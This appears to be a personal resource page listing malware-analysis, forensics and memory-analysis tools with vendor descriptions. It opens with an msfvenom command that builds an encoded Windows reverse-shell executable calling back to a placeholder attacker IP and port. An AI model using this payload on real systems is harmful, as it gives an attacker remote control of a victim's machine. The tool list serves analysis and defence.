Resources

Hold this command real quick

  • MSFVenmon Windows reverse shell binary
    • msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=<IP address to connect back too> LPORT=<Port to call back on> -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe
  • Compress large files
    • tar -c filename | gzip --best > file.tar.gz

Malware Analysis

  • Atom
    • Atom is a text editor that’s modern, approachable, yet hackable to the core—a tool you can customize to do anything but also use productively without ever touching a config file.
  • Sysinternals
    • SMB Share: \\live.sysinternals.com\tools\
    • Windows Sysinternals is a part of the Microsoft TechNet website which offers technical resources and utilities to manage, diagnose, troubleshoot, and monitor a Microsoft Windows environment.
  • Wireshark
    • Wireshark is a network protocol analyzer for Unix and Windows.
  • Network Miner
    • NetworkMiner makes it easy to perform advanced Network Traffic Analysis (NTA) by providing extracted artifacts in an intuitive user interface. The way data is presented not only makes the analysis simpler, it also saves valuable time for the analyst or forensic investigator.
  • Mandiant Red Line Tool
    • Mandiant’s premier free tool, provides host investigative capabilities to users to find signs of malicious activity through memory and file analysis and the development of a threat assessment profile.
  • Reg shot
    • Regshot is an open-source (LGPL) registry compare utility that allows you to quickly take a snapshot of your registry and then compare it with a second one – done after doing system changes or installing a new software product.
  • Hex editor
    • HxD is a carefully designed and fast hex editor which, additionally to raw disk editing and modifying of main memory (RAM), handles files of any size.
  • DumpIt
    • DumpIt is a compact portable tool which makes it easy to save the contents of your PC’s RAM.
  • Autopsy
    • Autopsy is a digital forensics platform and graphical interface to The Sleuth Kit and other digital forensics tools. It is used by law enforcement, military, and corporate examiners to investigate what happened on a computer. You can even use it to recover photos from your camera’s memory card.
  • PEviewer
    • PEview provides a quick and easy way to view the structure and content of 32-bit Portable Executable (PE) and Component Object File Format (COFF) files. This PE/COFF file viewer displays header, section, directory, import table, export table, and resource information within EXE, DLL, OBJ, LIB, DBG, and other file types.
  • IDA pro
    • IDA is a Windows, Linux or Mac OS X hosted multi-processor disassembler and debugger that offers so many features it is hard to describe them all.
  • Hopper Disassembler
    • Hopper is a reverse engineering tool for OS X and Linux, that lets you disassemble, and decompile your 32/64bits Intel Mac, Linux, Windows and iOS executables!
  • Recuva
    • Recuva can recover pictures, music, documents, videos, emails or any other file type you’ve lost. And it can recover from any rewriteable media you have: memory cards, external hard drives, USB sticks and more!
  • CaptureBAT
    • Capture BAT is a behavioral analysis tool of applications for the Win32 operating system family. Capture BAT is able to monitor the state of a system during the execution of applications and processing of documents, which provides an analyst with insights on how the software operates even if no source code is available. Capture BAT monitors state changes on a low kernel level and can easily be used across various Win32 operating system versions and configurations.
  • Dependency Walker
    • Dependency Walker is a free utility that scans any 32-bit or 64-bit Windows module (exe, dll, ocx, sys, etc.) and builds a hierarchical tree diagram of all dependent modules. For each module found, it lists all the functions that are exported by that module, and which of those functions are actually being called by other modules. Another view displays the minimum set of required files, along with detailed information about each file including a full path to the file, base address, version numbers, machine type, debug information, and more.
  • ProcDOT
    • There are plenty of tools for behavioral malware analysis. The defacto standard ones, though, are Sysinternals’s Process Monitor (also  known as Procmon) and PCAP generating network sniffers like Windump, Tcpdump, Wireshark, and the like. These “two” tools cover almost  everything a malware analyst might be interested in when doing behavioral malware analysis. But there’s a major problem with these tools. Any of them works in a so to say separated or isolated way, not knowing anything from each  other. Hence it’s kinda hard to get accordingly recorded activities together in one piece or picture. That’s where ProcDOT enters the stage. It  fills this actual gap by merging those records together.

Memory Analysis

  • Hex editor
    • HxD is a carefully designed and fast hex editor which, additionally to raw disk editing and modifying of main memory (RAM), handles files of any size.
  • DumpIt
    • DumpIt is a compact portable tool which makes it easy to save the contents of your PC’s RAM.
  • Mandiant Red Line Tool
    • Mandiant’s premier free tool, provides host investigative capabilities to users to find signs of malicious activity through memory and file analysis and the development of a threat assessment profile.